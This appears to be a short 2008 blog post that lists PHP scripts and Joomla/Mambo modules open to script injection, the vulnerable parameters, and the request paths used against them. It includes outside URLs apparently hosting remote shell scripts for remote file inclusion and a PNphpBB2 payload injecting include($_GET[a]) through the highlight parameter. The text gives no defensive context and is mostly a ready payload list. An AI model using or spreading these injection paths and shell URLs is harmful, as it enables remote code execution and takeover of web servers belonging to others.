Found vuln Script injection 05-04-08

Scipts Name:

ActiveCalendar
ActiveKB
Artmedic CMS
AutoStand (Joomla module)
Bubbling Library
Carousel Flash Image Gallery (Joomla module)
Coppermine Photo Gallery component (Mambo module)
CropImage (Mambo module)
Dayfox Blog
eNetman
ExtCalendar (Mambo module)
FlatMenu (Mambo module)
ISS Proventia GX5008
ISS Proventia GX5108
JoomlaPack (Joomla module)
L2J Statistik Script
Minki
MOSMedia Lite (Mambo module)
MyCalendar
NFN Address Book (Mambo module)
PHPDJ
swMenuFree (Mambo module)
Synergiser
TaskHopper (Joomla module)
Tour De France Pool (Joomla module)
Verlihub Control Panel
VisoHotlink
zOOm Media Gallery
ZPanel
?

Parameters used for code injection attempts:
a=
go1=
go=
highlight=
kobr=
mosConfig_absolute_path=
page=
pilih=
redir=
stranica=

Script injection:

http://www.geocities.com/p4n93r4nk0d0k/yhe.txt?
http://www.gumgangfarm.com/shop/data/id.txt?
http://h1.ripway.com/mala/id.txt?
http://www.xplproxysx.kit.net/phpcmdxkn.txt?
http://games.enet.com.cn/zhuanti/dkp/02.gif?
http://gujewear.com/bemarket/goods/qmono/Q-MoNoR6.txt???
http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt??

Url requested:
//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=v
iewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highli
ght=
--------------------------------------------------------------------------------------------
//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=v
iewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highli
ght=
--------------------------------------------------------------------------------------------
//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=v
iewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highli
ght=
--------------------------------------------------------------------------------------------
//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746
ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=
--------------------------------------------------------------------------------------------
//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746
ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=
--------------------------------------------------------------------------------------------
//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746
ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=
--------------------------------------------------------------------------------------------
//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746
ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=
--------------------------------------------------------------------------------------------
//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746
ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=
--------------------------------------------------------------------------------------------
//index.php?option=com_dwodp&Itemid=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?m
osConfig_absolute_path=
--------------------------------------------------------------------------------------------
/index.php?go1=
--------------------------------------------------------------------------------------------
/index.php?go=
--------------------------------------------------------------------------------------------
/index.php?kobr=
--------------------------------------------------------------------------------------------
/index.php?menu=deti&page=
--------------------------------------------------------------------------------------------
/index.php?menu=deti&page=
--------------------------------------------------------------------------------------------
//?option=com_custompages&cpage=
--------------------------------------------------------------------------------------------
/index.php?option=com_mtree&task=view&Itemid=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
/index.php?pilih=
--------------------------------------------------------------------------------------------
/index.php?redir=
--------------------------------------------------------------------------------------------
/index.php?stranica=
--------------------------------------------------------------------------------------------
/index.php?stranica=
Found vuln Script injection 05-04-08 Found vuln Script injection 05-04-08 Reviewed by Furkan Samadha on 8:15 AM Rating: 5